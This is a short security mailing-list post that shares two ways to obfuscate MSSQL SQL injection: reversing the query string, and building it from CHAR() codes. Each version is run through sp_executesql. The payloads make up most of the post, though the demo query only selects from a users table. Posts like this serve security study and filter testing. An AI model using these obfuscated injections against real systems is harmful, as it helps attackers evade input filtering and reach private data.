PaulDotCom mailing list archives
A fun Sql injection trick (MSSQL)
From: Pat <nutjob.ie () gmail com>
Date: Fri, 8 Jun 2012 12:43:55 +1000
Hi all,
I came from a developer background and found myself in business development
so in order to get my nerd on I started a blog as I do have the odd brain
fart.
Thought id share one of my favourites as I have seen a few posts out there
saying obfuscation of SQL injection is not possible...
*Example 1*
--MSSQL
--SELECT * FROM USERS;
'DECLARE @myvar nchar(50)= REVERSE(';sresu morf * tceles'); exec sp_executesql
@myvar ;--
*Example 2*
--MSSQL
--SELECT * FROM USERS;
DECLARE @myvar nchar(50)= + CHAR(83)+ CHAR(69)+ CHAR(76)+ CHAR(69)+ CHAR(67)+
CHAR(84)+ CHAR(32)+ CHAR(42)+ CHAR(32)+ CHAR(70)+ CHAR(114)+
CHAR(111)+ CHAR(109)+
CHAR(32)+ CHAR(85)+ CHAR(83)+ CHAR(69)+ CHAR(82)+ CHAR(83); exec sp_executesql
@myvar
For a script to generate example 2 see
http://stolenpackets.net/?p=11
Regards,
Pat
_______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- A fun Sql injection trick (MSSQL) Pat (Jun 07)
- Re: A fun Sql injection trick (MSSQL) Robin Wood (Jun 08)
- Re: A fun Sql injection trick (MSSQL) Pat (Jun 09)
- Re: A fun Sql injection trick (MSSQL) Robin Wood (Jun 08)